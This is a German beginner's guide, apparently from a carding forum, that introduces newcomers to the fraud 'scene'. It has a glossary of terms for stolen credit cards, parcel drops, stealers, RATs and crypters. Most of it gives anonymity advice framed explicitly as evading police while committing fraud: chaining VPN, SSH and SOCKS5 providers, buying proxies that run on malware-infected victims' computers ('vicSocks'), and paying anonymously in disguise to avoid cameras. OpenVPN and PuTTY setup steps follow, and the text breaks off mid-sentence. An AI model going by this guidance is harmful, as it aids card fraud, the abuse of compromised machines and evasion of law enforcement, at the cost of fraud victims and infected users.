Sie sind auf Seite 1von 77

(c)holy (c)holy

(c)holy
(c)holy (c)holy
(c)holy
~ 1 ~

Anfnger/Einsteiger Scene Guide


Inhalt:

1. Scene Begriffe [glossar]
2.Erste Schritte in der Scene
3. Allgemeine Scene Regeln und NoGos
4. SceneBoard bersicht
5. Nutzerrnge
6. Scene-Download-Pack

Vorwort:
Liebe Scene-User,
diese Guide wurde von daddelgottholy in Zusammenarbeit mit Taktlos verfasst und dient
dem Zweck, Neueinsteiger und Anfnger von Anfang an in die Scene zu integrieren, somit
beugen wir Busts und diverse Verstndigungsprobleme vor. Erlutert wird vom Einrichten
des Scene-PCs/Laptops ber den ersten Scene-Board Login, bis hin zur sicheren
Kontaktaufnahme via Instand Messenger und fortgeschrittene Scene-Techniken.






Diese Guide ist meinen ehemaligen Scene-Partnern ebu und Phen gewidmet, welche die
Scene leider verlassen haben. Ich wnsche euch auf eurem weiteren Weg eine positive und
erfolgreiche Zukunft. Ihr wart zwei Scene-User auf die man sich verlassen konnte.
Rest In Peace.

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 2 ~

1. Scene Begriffe [glossar]

HD = Hausdrop ( Leeres Haus)
BD = Bankdrop (Bankkarte)
BKD = Briefkastendrop (Briefkasten)
Carden = mit einer geklauten Kreditkarte Sachen kaufen
CC = Creditcard (Kreditkarte)
Clean = Frei von Viren/Trojanern
Acc = Account
Ano Sim = Anonyme Simkarte
AV = Antivirensoftware/AntiVir
DoB= Date of Birth (Geburtsdatum)
SC = secure code
Valid = Gltig
Invalid = ungltig
VPN = Virtuelles privates Netzwerk
VSB = Versandbesttigung
VTut = Videotutorial
Vic = Opfer
Unused = Unbenutzt
Trade = Ein Handel
UD = Undetected
SE = Social Engineering (manipulation des Opfers)
Selftested = Selbst getestet
PP = Paypal / Zahlungsmethode
PS = Packstation
PSC = Paysafecard
Public = etwas Verffentlichtes
Rat = Remote Administrator Tool / Trojaner
FUD = Full Undetected
NP = Non Public / Nicht ffentlich
FTP = File Transfer Protocol
TH = Treuhand
DoS bzw.. DDoS = Denail of Service
Faken = mit einer geklauten Kreditkarte + Proxy Accounts usw kaufen auf Kosten anderer.
Infected = Mit Viren/Trojaner infiziert
Faken = mit einer geklauten Kreditkarte + Games Keys handy pins usw kaufen auf Kosten anderer.
Drop = Ein Haus/Briefkasten/Packstation/Ort von Entgegennahme von gecardeter Ware.
FUD Crypter = Ein Tool, welches deine Server.exe gegen AV sicher macht.
Offline PSC = Offline erworbene Paysafecard,(Kauf an Tankstelle/kl. Lden)
Online PSC = Online erworbene Paysafecard (Kauf bei Paysafecard.com)
Phishing = Nachgemachte Seiten, die Passwrter anderer auf deinem FTP Server speichern.
Spread(en) = Das Verteilen von Stealern/Rats/etc......wird hufig falsch ausgesprochen!
Stealer = Ein Tool, welches eine Datei erstellt, die durch klicken Passwrter anderer auf deinem
FTP_Server speichert.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 3 ~

Socks5 = Sicherer Proxy, der deine Ip versteckt, um anonym im Netz zu sein.
Binder = Bindet 2 EXEn zu einer zusammen
ELV = Elektronisches LastschriftVerfahren
MD5 = Ein bestimmter Hash, der Passwrter, etc verschlsseln kann
Noob/Newbie = Ein unwissender Neuling
WME/WMZ = Online Geldwhrung
VM(Ware) = Virtual Machine, ein virtueller Computer auf dem man infizierte Programme ohne
Bedenken ffnen kann


2.Erste Schritte in der Scene


Ihr denkt jetzt kann es losgehen mit Geld verdienen, Free Stuff abstauben oder andere illegale
Aktivitten durchzufhren? FALSCH! Ihr msst von Anfang an vorbeugen, dazu dient als
erstes das Crypten eurer Festplatten. Um dies durchzufhren empfehle ich euch truecrypt.
erhltlich auf: http://www.truecrypt.org/





































(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 4 ~






Nun, da ihr eure Festplatten ge-cryptet habt, geht es mit dem Absichern eure Onlinezugnge weiter.
Login-Seiten wie z.B. Facebook, Steam, diverese Boards und Foren, Online-Banking, etc sind beliebte
Seiten fr sogenannte "Bruteforce Angriffe (=Gewaltsames Eindringen)" dazu werden oft genutzte
Standard Passwrter mit eurem Nutzernamen durchgetestet, sollten diese nicht funktionieren,
werden Zahlen, Buchstaben, Sonderzeichen Kombinationen durchgetestet bis ein Erfolg vorliegt. Aus
diesem Grund solltet ihr Besonders Lange und komplexe Passwrter whlen. Dazu empfehle ich das
Tool "Lastpass". "Lastpass" Verschlsselt eure online-Zugnge erneut und speichert eure Login-Daten
auf einer sicheren Datenbank. Diese Datenbank wird mit einem "Master-Passwort" versehen,
welches frei whlbar ist. Nun solltet ihr ein Passwort wie z.B. %0815XXXporn-freak%1337boZzliKe-.-'
whlen. erhltlich auf: http://lastpass.com/


Nun sind eure Passwrter und Festplatten gegen fremde Eingriffe durch Hacker und den Staat
geschtzt. Natrlich finden sich immer Wege durchzukommen, jedoch kann dies ein langjhriger
Prozess mit viel Arbeitsaufwand sein. Doch es reicht immer noch nicht, ich wei Ihr wollt endlich
loslegen stimmt's?! Sorry Leute aber ohne Anonymitt wrt ihr schneller im Knast und vor Gericht
als ihr euch einloggen knnt.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 5 ~


Deshalb wird nun Ausfhrlich ber die Anonymitt im Internet berichtet. An diesem Punkt danke ich
Taktlos dass er seinen Beitrag zu diesem Thema geleistet hat. Respekt an ihn fr seine
Ausfhrlichkeit.

Wenn man im Internet in der Szene unterwegs ist, sollte man vermeiden, mit seiner richtigen IP
unterwegs zu sein. Das hat einen ganz einfachen Grund, der vielen unbelesenen oft nicht ganz klar zu
sein scheint. Sollte es durch die Polizei, das BKA oder sonstige Ermittlungsbehrden zu
Investigationen in irgendeinem Fall kommen, so gelangen eben diese recht schnell an die
verwendete IP. Da reicht meist ein Briefwechsel zwischen der Polizei und z.B. der gecardeten oder
gefakten Seite und die IP ist in den Hnden der Polizei. Wenn die Ermittlungsbehrden erst mal die IP
haben, dann fhrt diese recht schnell ber eine Anfrage beim ISP (Internet Service Provider, z.B.
Telekom) zu euren Rechnungsdaten bzw. zu denen von Mutti oder Papi ;)

Das wollen wir natrlich umgehen. Deswegen bieten einige Dienstleister im Internet
Anonymisierungsdienste an, die es ermglichen, seine richtige IP durch verschiedene Methoden zu
verschlsseln. Dabei sollte man nicht jeden Cent umdrehen, sondern ruhig etwas das Portmonee
lockern. Wer sicher und anonym im Internet unterwegs sein will, der muss auch bereit sein, etwas
Geld zu investieren, kostenlose Anbieter kann man alle vergessen..
Prinzipiell, und das ist wichtig zu verinnerlichen, gibt es keine absolute Sicherheit auf Anonymitt,
selbst wenn der Service-Mitarbeiter buchstblich seine Hand ins Feuer legt. Im Falle einer intensiven
Investigation kann im schlimmsten Falle immer eure reelle IP herauskommen und dann seid ihr
strafrechtlich verfolgbar. Wenn man jedoch bedenkt, wie viele Idioten komplett ohne
Anonymisierung unterwegs sind und sogar carden, dann ist man natrlich mit
Anonymisierungsdiensten schon eher der letzte, der gepackt wird ;)

Wer dieses ganze Tutorial umgehen will, der kann sich einen Ano-UMTS-Stick holen und eine Ano-
Sim und ber einen Laptop surfen. Dazu gibt es am Ende noch ein paar Informationen wie
grundlegende Regeln, wie man sich auch mit einem Ano-UMTS-Zugang verhlt, um die Anonymitt
noch weiter zu erhhen.



Methoden zur Verschlsselung und Anonymisierung
Es gibt viele Mglichkeiten, seine Spuren im Internet zu verschlsseln. Dabei unterscheidet man
generell zwischen zwei Methoden, der Verschlsselung und der Tunnelung (von engl. tunneling,
natrlich kein richtiges deutsches Wort). Was das bedeutet, lsst sich recht einfach am Beispiel eines
Briefes verdeutlichen.

Wenn ihr einen Brief verschickt und nicht wollt, dass der Brief auf euch zurckzufhren ist, so gibt es
zwei Mglichkeiten. Ihr gebt den Brief einer Person, die den Inhalt verschlsselt und erst dann
versendet oder ihr gebt den Brief einer Person, die ihn in ihrem Namen versendet und euch so
anonymisiert. Natrlich gilt dies auch fr Briefe, die ihr empfangt, nur umgekehrt.

Spter werden wir sehen, dass es am besten ist, die Briefe auf beide Arten zu anonymisieren und am
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 6 ~

allerbesten auch noch durch zwei verschiedene Personen ;)

Gut, dann stelle ich euch mal diese beiden Personen vor, sie heien VPN und Sock5 ;)


VPN (der Verschlsseler)

VPN steht fr Virtual Private Network. Der Name sagt eigentlich schon alles. Man verbindet mit
seinem PC, also mit seiner IP, zu einem Server. Dieser Server bindet den PC dann in das
Heimnetzwerk ein, sodass die Daten zuerst an den Server gesendet werden und dann an den
eigenen PC, also ein virtuelles Heimnetzwerk. VPN-Server haben verschiedene Funktionen, uns
interessiert in unserem Falle aber nur die Funktion der Verschlsselung.

Das VPN verwendet Login-Daten, damit nur berechtige (hier: zahlende) User Zugriff auf den Server
haben und zustzlich werden die eingehenden und ausgehenden Daten egal welcher Art sicher und
unknackbar verschlsselt. So kann keiner euren Traffic abfangen und die Daten auslesen, da sie
verschlsselt sind. Die Analogie zu der Person, die einem den oben erwhnten Brief verschlsselt und
dann versendet, wird nun klar.


SSH-Tunnel und Sock5

Mchte man seine IP verschlsseln (ggf. nachdem man den Traffic-Inhalt bereits per VPN
verschlsselt hat), dann verwendet man so genannte SSH-Tunnel und Sock5-Server. Das Sock5-
Protokoll ermglicht mittels Authentifizierung (mit den Login-Daten des Anonymisierungs-Anbieters,
den man verwendet) das Tunneln der Daten, was am Ende dazu fhrt, dass man nach auen hin
nicht mehr seine eigene IP hat, sondern die IP des Socks-Proxys.

SSH-Tunnel (auch SSH-Socks genannt) verschlsseln zustzlich die Daten mittels SSH (Secure Shell).
Der Sock-Server ist also die Person, die euren Brief nach der Person, die ihn verschlsselt hat, erhlt
und diesen in seinem Namen an den Empfnger schickt, der SSH-Tunnel verschlsselt den Brief dann
noch zustzlich.

Dabei richtet man zuerst den SSH-Tunnel ein und anschlieend den Sock5.


vicSock

Da man zur Erhhung der Sicherheit einen Sock-Server auswhlt, der juristisch am besten weit weg
ist (z.B. China, Russland, Afrika), hat man natrlich dadurch die IP des Serverstandorts. Mittels IP-
Geotagging knnen Seiten (wie welche, die ihr z.B. besuchen wollt) so euren Standort ermitteln und
euch den Zugriff, egal welcher Art, verwehren (wichtig v.a. bei PayPal und Carden allgemein). Eine
afrikanische IP bestellt fr gewhnlich nicht bei Amazon nach Kln ;)

Deswegen schaltet man noch hinter den Sock5-Proxy einen vicSock. Dieser fhrt dazu, dass ihr eine
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 7 ~

deutsche IP habt. vicSocks werden erstellt, in dem man Schadsoftware auf einen Computer bringt,
der es dann ermglicht, eben diesen, wenn er im Internet ist, als Proxy zu verwenden. Man erhlt
dann die IP des Schadsoftware-Victims, daher auch der Name vicSock.
Da das Implementieren von Schadsoftware mittels E-Mail BOTs oder hnliches natrlich nicht legal
ist, knnt ihr keine vicSocks bei renommierten Anonymisierungsdienstleistern erwerben, sondern
msst diese auf Szene-Seiten oder bei Vendorn in Szene-Foren kaufen. Manchmal findet man auch
welche in der Free-Section von Szene-Foren, die funktionieren. Hat man erst mal einen vicSock, der
nicht auf der Blacklist ist (auch unique vicSock genannt), kann man den Seiten, auf denen man surft,
vortuschen, man htte eine normale deutsche IP und das, obwohl man einen VPN-Server und einen
Sock5-Server verwendet, die weit weg von Deutschland stehen.
Wichtig ist hierbei, dass es sich um einen Non-Logging vicSock handelt, einen, der die IP also nicht
loggt. Dabei msst ihr natrlich auf den Szene-Service, den ihr fr die vicSocks nutzt, oder eben den
Vendor, bei dem ihr die vicSocks kauft, vertrauen.

Grundlegendes
Manche Leute schwren darauf, einen VPN-Server, danach einen SSH-Tunnel und dahinter zwei oder
sogar mehr Sock5-Server zu schalten (und dann ggf. den vicSock). Das ist an sich nicht
empfehlenswert, da alle Server bei einem Anbieter sind. Die Anzahl der hintereinander geschalteten
Server von einem Anbieter erhht nicht die Sicherheit, da es sich trotzdem nur um einen einzigen
Briefwechsel zwischen Ermittlungsbehrde und Anbieter handelt, wenn dieser deine Daten rausgibt,
dann macht er das auch, wenn du 10 Sock5-Server hintereinander geschaltet hast.

Daher empfiehlt es sich, Anbieter zu kombinieren.
So kann man z.B. VPN (Perfect Privacy) + SSH Tunnel (Perfect Privacy) + Sock5 (Socks Service)
verwenden. Sollte Perfect Privacy loggen und IPs rausgeben, so schtzt euch immer noch Socks
Service und umgekehrt. Das ist eigentlich die einzige Methode, die Sicherheit erneut zu steigern.

Folgende Regel sollte euch ausreichende Sicherheit bringen:

Fr Szene-Foren, Szene-ICQ und Rumlesen: VPN + SSH Tunnel + Sock5 reicht!
Fr den ganzen Gangster-Kram: VPN + SSH Tunnel + Sock 5 (anderer Anbieter) + vicSock notwendig!
Nachdem man nun die grundlegenden Begriffe verinnerlicht hat, muss man sich fr einen bzw. lt.
Tipp fr mind. zwei Anbieter entscheiden.

Anbieter
Ein wichtiges Werbemittel aller Anbieter ist das angeblich nicht vorhandene Logging der IPs. Nun ja,
erzhlen knnen die einem viel, ich persnlich habe aber noch nie von einem Fall gehrt, bei dem ein
Carder oder ein anderer Internet-Kleinkrimineller trotz der Verwendung von guten, renommierten
Anonymisierungsdiensten gebustet worden ist.
Klrt mich auf, falls ich so einen Fall verschlafen habe. Aber dennoch ist da Vorsicht geboten,
Anbieter knnen ihre Firmenphilosophie ndern, falls Strafverfolgungen drohen und Deals mit der
Staatsanwaltschaft geschlossen werden. Diesen Fall muss man immer beachten, kann aber auch
schlecht dagegen vorbeugen, im Prinzip ist es am Ende eine Vertrauenssache. Hier mal eine kleine
Liste an bekannten Anbietern.

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 8 ~

Perfectprivacy.com

Meiner Meinung nach einer der besten Anonymisierungs-Anbieter. Die Server sind verhltnismig
schnell, die Standorte sind recht gut gewhlt und der Support ist wirklich super, hinzu kommt noch
ein nicht allzu hoher Preis.

Angebot: VPN, PPTP VPN, SSH-Tunnel, Sock5

Monatsgebhr: 25 Euro

Mengenrabatt?: Ja

Jahresgebhr: 150 Euro, sprich 12.50 Euro pro Monat

Zahlungsmittel: PayPal, Amex, Mastercard, Visa, eCheck, Liberty Reserve Euro, PaySafeCard und
WebMoney.

Serverstandorte: Australien, China (Hong Kong, Shanghai), Malaysia, Israel, Rumnien, Tschechien,
Schweden, Russland, Ukraine; Deutschland, Schweiz, Luxemburg, Niederlande, Frankreich, Vereintes
Knigreich, Kanada, USA, Panama und Argentinien

Vorteile: Groe Serveranzahl, gute Geschwindigkeit, guter Support, verhltnismig gnstig, PP
bietet seinen Kunden einen bereits vorkonfigurierten SSH-Client an, nur noch Server auswhlen,
Login-Daten eintragen und fertig.

Nachteile: Viele Server stehen in Lndern, die es mit dem Datenschutz nicht so ernst nehmen (z.B.
USA), diese sollte man daher lieber nicht verwenden am Ende bleiben dann doch nur ca. 7 Server,
die verwendet werden sollten.


Die Registrierung verluft mit PaySafeCard oder uKash ziemlich anonym, daher wrde ich
grundstzlich diese Bezahlmethode verwenden. Aber das sollte ja ohnehin auch fr Szene-Einsteiger
klar sein.



socks-service.info

Auch ein altbekannter Anbieter, der leider stark nachgelassen hat. Als VPN-Anbieter nicht
empfehlenswert, wenn man nur die Sock5 benutzt aber ausreichend. Die Preise sind recht gnstig
und man hat sogar die Mglichkeit, ein kleines Paket zu whlen, bei dem der VPN-, SSH Tunnel und
Sock5-Server den gleichen Standort habe. Dazu sei gesagt, dass das die Sicherheit natrlich enorm
einschrnkt, da der Sock5 im schlimmsten Fall ausreicht, um an eure richtige IP zu kommen, da es
sich um den gleichen Standort handelt.

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 9 ~

Angebot: VPN, PPTP, SSH-Tunnel, Sock5

Monatsgebhr: 15 Euro (Light = nur ein Serverstandort), ca. 29 Euro (Full = Alle Standorte)

Mengenrabatt?: Ja

Jahresgebhr: 146 Euro, ca. 12 Euro pro Monat (Light), 292 Euro, ca. 25 Euro pro Monat (Full)

Zahlungsmittel: PaySafeCard, WebMoney, uKash

Serverstandorte: Frankreich, Luxemburg, Niederlande, Russland, Schweden, Vereintes Knigreich,
USA (bei Light-Package ist nur einer verfgbar)

Vorteile: Fr Forum-Aktivitten oder fr den Fall, dass man Anbieter kombinieren mchte und
demnach nur den Sock5-Server braucht, bietet ss.info ein recht gnstiges Light-Package an (lediglich
nur ein Serverstandort). Wenn man nur den Sock5-Server braucht oder nur harmlos in der Szene
unterwegs ist, sollte das aber kein Problem sein.
Nachteil: Verhltnismig teuer, Full Package kostet mit 292 Euro Jahresgebhr fast doppelt so viel
wie das Jahresabo bei Perfect Privacy, Serverstandorte hauptschlich in Europa



Secretsline.biz
Auch ein seriser Anbieter. Habe ihn bisher noch nie selber benutzt, daher sind die Informationen
auch nur von der Seite zusammengetragen. Habe aber weder in den Szene-Foren noch im restlichen
Internet irgendwelche eklatanten negativen Meinungen dazu gefunden, scheint also auch ein guter
Anbieter zu sein. Leider sind die Server Standorte nicht optimal, da viele im westlichen Europa bzw.
in Nordamerika stehen.


Angebot: VPN, im Full Package auch Double VPN, PPTP, SSH-Tunnel (???), Sock5

Monatsgebhr: 29 Euro (Light = kein Double VPN), 39 Euro (Full = Double VPN)

Mengenrabatt?: Ja

Jahresgebhr: 199 Euro (Light), 269 Euro (Full)

Zahlungsmittel: So gut wie alle (PayPal, CC, WM, LR, uKash, WU

Serverstandorte: Deutschland, USA, Estland, Niederlande, Malaysia, Grobritannien, Australien,
Kanada, Tschechien, Israel, Schweden, sterreich, Russland, Ungarn, Italien

Vorteile: Wenn man das groe Package verwendet, dann steht einem ein Double VPN Service zur
Verfgung, viele Zahlungsmittel (ber weitere Vorteile, die diesen Anbieter von den anderen
abheben, wrde ich mich freuen)
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 10 ~


Nachteil: Verhltnismig teuer, Full Package kostet mit 269 Euro Jahresgebhr 1 Mal so viel wie
das Jahresabo bei Perfect Privacy; ein groer Nachteil sind die hauptschlich europischen und
nordamerikanischen Serverstandorte.



oVPN.to

Ein mehr oder weniger neuer Anbieter, der sich anscheinend hauptschlich auf die Szene
konzentriert. Ich selber habe ihn noch nie genutzt. ber die Qualitt des Dienstes kann ich daher
kaum Aussagen treffen aber man trifft in der Szene immer mehr Zweifler an der Serisitt des
Anbieters. Ich denke, hier muss jeder selber wissen, ob er auf die Zweifler hrt oder auf den doch
recht groen zufriedenen Kundenstamm. Die Preise sind aber unschlagbar, das muss man denen
lassen und der Service soll wohl auch ganz gut sein. So trifft man z.B. oft auf oVPN Mitarbeiter in
bestimmten Foren und kann diese direkt ansprechen bzw. etwas fragen (bei Bedarf, Anfrage nach
diesem Forum per PN)

Angebot: VPN, SSH-Tunnel, Sock5

Monatsgebhr: 11 Euro

Mengenrabatt?: Ja

Jahresgebhr: 99 Euro

Zahlungsmittel: PaySafeCard, uKash, WebMoney, Liberty Reserve

Serverstandorte: Russland, Niederlande, Grobritannien, Ukraine, Kanada, Deutschland, USA,
Frankreich, Luxemburg, Schweiz

Vorteile: sehr gnstig, lt. Anderer Nutzer guter Service, oVPN Mitarbeiter in einigen Foren unterwegs
und knnen dort direkt Support geben (bei Interesse welches Forum speziell gemeint ist, bitte eine
PN an mich)

Nachteil: im Internet sind einige Zweifel an der Serisitt zu finden, inwiefern man denen Glauben
schenken kann, muss jeder fr sich selber entscheiden



Wenn ihr mich nach meiner persnlichen Meinung fragt, dann wrde ich, falls nur Geld fr einen
Service da ist, auf jeden Fall Perfect Privacy empfehlen. Falls ihr den Gangster-Kram machen wollt,
dann holt euch Perfect Privacy fr den VPN und den SSH-Tunnel und ein Light-Package von
Secretsline fr den Sock5. Dahinter noch ein vicSock fr die ganz bsen Leute hier und ihr solltet
glcklich sein ;)

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 11 ~

Ich wrde mich auch von Szene-Anbietern fr VPNs unc Co. fernhalten. Wenn die Anbieter-Seite zu
sehr nach Gangster-Untergrund-Haxx0r aussieht, dann lasse ich da immer die Finger von, wer wei,
ob die loggen. Muss dann aber am Ende jeder fr sich selber entscheiden.



Einrichten der Anonymisierung
Hier werde ich Schritt fr Schritt und gut bebildert die Anonymisierung vom Schritt der Registrierung
bei einem Anonymisierungsdienst bis hin zum endgltigen Check bei einem IP-Checker erklren.
Dabei kann ich natrlich nicht auf alle Anonymisierungsdienste eingehen, da ich persnlich fast
immer Perfect Privacy empfehle, zeige ich euch die Einrichtung mit den Perfect Privacy Diensten. Im
Prinzip ist es jeodoch berall gleich und man kann die hier aufgefhrten Informationen analog auf
alle anderen Dienstleister anwenden. Wundert euch also nicht, wenn immer von Perfect Privacy die
Rede ist, denkt euch einfach den Namen eures Anbieters rein ;)


I. Zahlungsmittel besorgen, auf Anbieterseite registrieren und bezahlen
1. Schritt: Nachdem man sich entschieden hat, welchen Anbieter man verwendet, dann geht man zu
einer Tankstelle, zieht sich im Sommer eine Sonnenbrille und im Winter einen Mtze mit dickem
Schal an und kauft dort den uKash-Wert, den man fr die Registrierung verwendet. Ich wei, ich bin
ein ziemlich paranoider Bastard, aber ich persnlich habe keine Lust, falls es wirklich hart auf hart
kommt, dass die Tankstelle ein schickes Hochzeitsfoto von den Kameras an die Polizei abgibt.
2. Schritt: Man verwendet den uKash-Code und registriert sich auf Perfect Privacy oder analog bei
einem anderen Anbieter. Bei Perfect Privacy meldet sich ein Admin per E-Mail bei einem und fragt
nach dem uKash Code. Diesen schickt man dann zu und bekommt innerhalb von hchstens 48
Stunden die Login-Daten fr den Mitgliederbereich und natrlich auch die Server. Meistens geht es
aber schneller. Auf anderen Seiten ist die Anmeldung wiederrum instant, also sofort und
automatisiert. Nachdem man die Zugangsdaten erhalten hat, kann man sich in den Mitgliederbereich
des Sicherheitsanbieters anmelden und erhlt dort alle notwendigen Informationen, sprich Server
IPs, spezielle Programme (wie vorkonfiguriere SSH-Clienten) und ziemlich gut beschriebene Tutorials
zum Einrichten.

Leider sind diese oft auf Englisch, weshalb ich hier noch mal alles haargenau und mit Bildern erklre.

II. Nach Erhalt der Zugangsdaten einrichten des VPN
1. Schritt: Nachdem man die Zugangsdaten zum Mitgliederbereich erhalten habt, kann man sich nun
an das Einrichten der Anonymisierung machen. Dazu muss Open VPN heruntergeladen werden.
Dabei handelt es sich um ein Open Source VPN-Client, der demnach auch kostenlos ist. Ihr knnt ihn
hier herunterladen.

Nachdem ihr den Clienten runtergeladen habt, installiert ihr diesen und geht ber zu Schritt 2. Noch
nicht starten.


(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 12 ~

2. Schritt: Open VPN lsst sich recht einfach konfigurieren, da alle Anonymisierungs-Anbieter die
Konfigurationsdateien fr Open VPN zum Download anbieten. Diese mssen dann nur noch in den
richtigen Ordner kopiert werden und Open VPN ist dann bereits richtig konfiguriert, dann braucht ihr
nur noch den VPN-Server auswhlen, auf den ihr connecten wollt, und seid mit diesem verbunden,
nachdem ihr die Zugangsdaten eingegeben habt.
Wie das geht, erklre ich euch hier natrlich. Ihr loggt euch bei Perfect Privacy (oder bei einem
anderen Anbieter) ein und ladet im Download-Bereich die Config-Dateien fr Open VPN runter. Dazu
geht ihr bei Perfect Privacy in die Download-Section und ladet unter OpenVPN Config Files die
Open VPN-Konfigurationsdateien fr alle Server runter, dann knnt ihr spter bei openVPN einfach
einen der vielen Server auswhlen.
Dabei erhaltet ihr eine zip-Datei. Diese extrahiert ihr mit dem Windows-eigenen Entpacker, Winzip
oder Winrar. Im Ordner, in den ihr die Zip-Datei extrahiert habt, finden sich nun viele Dateien, hier
mal ein Bild.



(Bild 1)


3. Schritt: Diese Dateien msst ihr nun den Config-Ordner von Open VPN kopieren, wie auf dem Bild.
Dieser befindet sich standardmig hier c:\Program Files\OpenVPN\config das kann natrlich bei
euch anders sein, dann kopiert ihr die Dateien halt in den config-Ordner an dem Ort, wo ihr Open
VPN hin installiert habt.

4. Schritt: Nun startet ihr endlich die Open VPN GUI, also die auf Windows abgestimmte
Benutzeroberflche von Open VPN.
Dabei ist wirklich sehr, sehr wichtig, dass ihr das Programm als Administrator startet. Mit Rechtsklick
auf Eigenschaften geklickt, lsst sich das Programm immer als Adminstrator starten, dazu nur einen
Haken bei Programm als Adminstrator ausfhren unter dem Reiter Kompatibilitt setzen.
Wenn ihr das Programm nicht als Adminstrator startet, dann funktioniert es nicht richtig und eure
richtige IP wird trotzdem vermittelt.



(Bild 2)
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 13 ~



Ein kleines Icon entsteht im System Tray (zwei nebeneinander stehende Monitore). Die Monitore
leuchten rot, wenn keine Verbindung besteht, gelb, wenn eine Verbindung aufgebaut wird und Grn,
wenn eine Verbindung zu einem VPN Server besteht.
Klickt man mit der rechten Maustaste auf das Icon von Open VPN, so kann man, wenn man die
Konfigurationsdateien richtig in den config-Ordner kopiert hat, einen Server auswhlen, auf den
connectet werden soll.



(Bild 3)


5. Schritt: Fr welchen Server man sich entscheidet, sollte an sich klar sein. Man nimmt natrlich
keine europischen Server, sondern lieber Ostasiatische oder Afrikanische.
Wenn man nicht wei, fr welchen Server man sich zwecks besserer Geschwindigkeit entscheiden
soll, dann gibts im Mitgliederbereich eures Anbieters eine Liste der Server mitsamt allen
Informationen. Dort steht neben der Server-IP und den Ports auch die Auslastung des Servers.

Also Server auswhlen und auf Connect klicken.


(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 14 ~


(Bild 4)


6. Schritt: Es ffnet sich, nachdem man einen Server ausgewhlt hat, ein Fenster und nach einigen
Sekunden wird man nach den Login-Daten gefragt, die man dann eintrgt.



(Bild 5)


Nach einigen Sekunden sollte eine Verbindung aufgebaut sein, indem sich dieses Fenster schliet.
Die Monitore im Tray-Icon leuchten grn und eine kleine Meldung erscheint, dass eine Verbindung
zum Server hergestellt worden ist, z.B. Moskau.



(Bild 6)


Nachdem nun eine Verbindung mittels Open VPN hergestellt wurde, sind alle Daten des Ein- und
Ausgangstraffics verschlsselt. berprft man nun seine IP bei einem IP-Checker wie whoer.net,
dann erscheint die IP des VPN-Servers. Leider ist die DNS dann immer noch deutsch, dies ndern wir
spter.
Wie man sieht, ist die eigene IP und DNS nur mit Open VPN nicht ganz sicher, deswegen schaltet man
einen Sock5-Server dahinter, ich verwende hier zuerst einen SSH-Tunnel und danach einen Sock5.

III. Einrichten des SSH-Tunnel (mittels Perfect Privacy SSH-Client)


Der Vorteil bei Perfect Privacy liegt darin, dass der Dienstleister euch einen eigens vorkonfigurierten
SSH-Clienten anbietet.

1. Schritt: Diesen knnt ihr bei Perfect Privacy im Mitgliederbereich unter Downloads runterladen.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 15 ~

Danach installiert ihr diesen. Open VPN ist ja

bereits gestartet und verbunden, dann knnt ihr natrlich auch hier wieder ganz, ganz wichtig mit
Adminstratorrechten den Perfect Privacy SSH-

Client starten. Auch hier knnt ihr wie oben das Starten als Adminstrator automatisieren (Siehe Bild
2).



(Bild 7)


2. Schritt: Ihr sucht euch einen Server aus (natrlich nicht den selben wie bei Open VPN), gebt die
Zugangsdaten ein, macht einen Haken bei Passwort

speichern und bei Dauerhafte Verbindung, wie auf Bild 7. Die Haken bei Automatische
Verbindung und bei SSH ber HTTP Proxy lasst ihr weg.

3. Schritt: Nun klickt ihr auf Verbinden. Nach einigen Sekunden verschwindet das Programm (bleibt
aber natrlich im System Tray), die Verbindung ist

hergestellt. Zustzlich erscheint neben dem System-Tray Icon des Perfect Privacy SSH-Client ein
kleines gelbes Logo, das bedeutet ihr seid verbunden.
Um sicher zu gehen knnt ihr den Client aus dem System Tray heraus starten und knnt dort sehen,
ob ihr verbunden seid. Wenn ihr alles richtig gemacht

habt, dann sollte es so aussehen.



(Bild 8)


Also: VPN Monitore beide grn, SSH Client mit gelbem Icon.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 16 ~




IV. Einrichten des SSH-Tunnels mittels Putty bei anderen Anbietern als Perfect Privacy


Wenn ihr nicht Perfect Privacy verwendet, dann msst ihr einen anderen SSH Client verwenden. Das
ist auch nicht viel komplizierter. Dazu verwenden wir

das Freeware-Programm PuTTY. Dieses knnt ihr hier:
http://www.chiark.greenend.org.uk/~s.../download.html runterladen.


1. Schritt: Installiert PuTTY und startet es mit Adminstratorrechten, das Programm muss nicht
installiert werden. Auch hier knnt ihr wie am Beispiel

open VPN auf Bild 2 gezeigt, das Starten als Adminstrator automatisieren.

2. Schritt: Nun gebt ihr die IP des Servers auf dem Startbildschirm bzw. unter Session und dann
Logging ein. Bei manchen Anbietern ist die IP des

Servers eingetragen als eine domain, z.B. shanghai.perfect-privacy.com, hier tragt ihr natrlich den
Servernamen ein. Als Port tragt ihr den vom

Anbieter angegebenen SSH-Port fr den Server auf den ihr verbindet an (meist: 22).



(Bild 9)


3. Schritt: Dann msst ihr noch ein, zwei Einstellungen vornehmen, die ich aus Zeitgrnden hier nicht
weiter erlutern werde. Es gibt zahlreiche

Tutorials zu PuTTY, die ihr ohne Probleme verwenden knnt. Die Einstellung ist ohnehin immer die
gleiche. Zustzlich findet ihr bei eurem

